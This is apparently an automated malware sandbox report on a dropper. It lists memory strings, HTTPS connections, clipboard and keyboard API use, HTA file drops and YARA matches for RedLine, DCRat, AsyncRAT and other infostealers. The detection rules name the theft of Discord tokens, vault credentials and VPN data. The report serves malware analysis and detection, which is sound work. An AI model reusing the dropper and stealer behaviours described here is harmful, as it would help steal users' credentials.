Source: 0a633717d1.exe, 00000017.00000003.2414691709.000000000589E000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2509580790.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2735130853.000000000579A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: 376bb929a5.exe, 0000001C.00000003.2751029680.00000000059BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: 376bb929a5.exe, 0000001C.00000003.2751029680.00000000059BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: 376bb929a5.exe, 0000001C.00000003.2751029680.00000000059BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0a633717d1.exe, 00000017.00000003.2414977228.00000000059BC000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2504456322.0000000005D1B000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2751029680.00000000059BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000033.00000002.2636588578.000002B1BBD70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000033.00000002.2636588578.000002B1BBD70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49854 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Keylogger Generic

Source: Yara match	File source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D4EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00D4EAFF

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D4ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00D4ED6A

Source: C:\Users\user\Desktop\random.exe

0_2_00D4EAFF

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D3AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_00D3AA57

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D69576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00D69576

System Summary

Malicious sample detected (through community Yara rule)

Source: 21.2.6d81c0d08d.exe.d10000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 21.2.6d81c0d08d.exe.d10000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 21.2.6d81c0d08d.exe.d10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 54.2.48a23b3144.exe.3f09550.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000015.00000002.2888528335.0000000000D12000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000015.00000003.2287725007.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: 6d81c0d08d.exe PID: 1160, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Binary is likely a compiled AutoIt script file

Source: random.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: random.exe, 00000000.00000002.1426156970.0000000000D92000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6b675f4a-3
Source: random.exe, 00000000.00000002.1426156970.0000000000D92000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_97d584bd-9
Source: 1f8e467ee9.exe, 0000001B.00000002.2756179824.0000000000FB2000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_15961029-9
Source: 1f8e467ee9.exe, 0000001B.00000002.2756179824.0000000000FB2000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_7c73a4ab-0
Source: 84b9c8b064.exe, 0000001F.00000000.2537530343.0000000000B12000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_392650bf-b
Source: 84b9c8b064.exe, 0000001F.00000000.2537530343.0000000000B12000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_cc514856-5

Creates HTA files

Source: C:\Users\user\Desktop\random.exe	File created: C:\Users\user\AppData\Local\Temp\m5569IMo3.hta			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe	File created: C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta

PE file contains section with special chars

Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: section name:
Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: section name: .idata
Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: section name:
Source: skotes.exe.11.dr	Static PE information: section name:
Source: skotes.exe.11.dr	Static PE information: section name: .idata
Source: skotes.exe.11.dr	Static PE information: section name:
Source: random[1].exe.18.dr	Static PE information: section name:
Source: random[1].exe.18.dr	Static PE information: section name: .idata
Source: random[1].exe.18.dr	Static PE information: section name:
Source: b7668220f8.exe.18.dr	Static PE information: section name:
Source: b7668220f8.exe.18.dr	Static PE information: section name: .idata
Source: b7668220f8.exe.18.dr	Static PE information: section name:
Source: random[1].exe0.18.dr	Static PE information: section name:
Source: random[1].exe0.18.dr	Static PE information: section name: .idata
Source: random[1].exe0.18.dr	Static PE information: section name:
Source: 6d81c0d08d.exe.18.dr	Static PE information: section name:
Source: 6d81c0d08d.exe.18.dr	Static PE information: section name: .idata
Source: 6d81c0d08d.exe.18.dr	Static PE information: section name:
Source: random[1].exe1.18.dr	Static PE information: section name:
Source: random[1].exe1.18.dr	Static PE information: section name: .idata
Source: random[1].exe1.18.dr	Static PE information: section name:
Source: 0a633717d1.exe.18.dr	Static PE information: section name:
Source: 0a633717d1.exe.18.dr	Static PE information: section name: .idata
Source: 0a633717d1.exe.18.dr	Static PE information: section name:
Source: random[2].exe.18.dr	Static PE information: section name:
Source: random[2].exe.18.dr	Static PE information: section name: .idata
Source: random[2].exe.18.dr	Static PE information: section name:
Source: 376bb929a5.exe.18.dr	Static PE information: section name:
Source: 376bb929a5.exe.18.dr	Static PE information: section name: .idata
Source: 376bb929a5.exe.18.dr	Static PE information: section name:
Source: random[2].exe0.18.dr	Static PE information: section name:
Source: random[2].exe0.18.dr	Static PE information: section name: .idata
Source: random[2].exe0.18.dr	Static PE information: section name:
Source: 327981c77b.exe.18.dr	Static PE information: section name:
Source: 327981c77b.exe.18.dr	Static PE information: section name: .idata
Source: 327981c77b.exe.18.dr	Static PE information: section name:
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: section name:
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: section name: .idata
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: section name:
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: section name:
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: section name: .idata
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: section name:
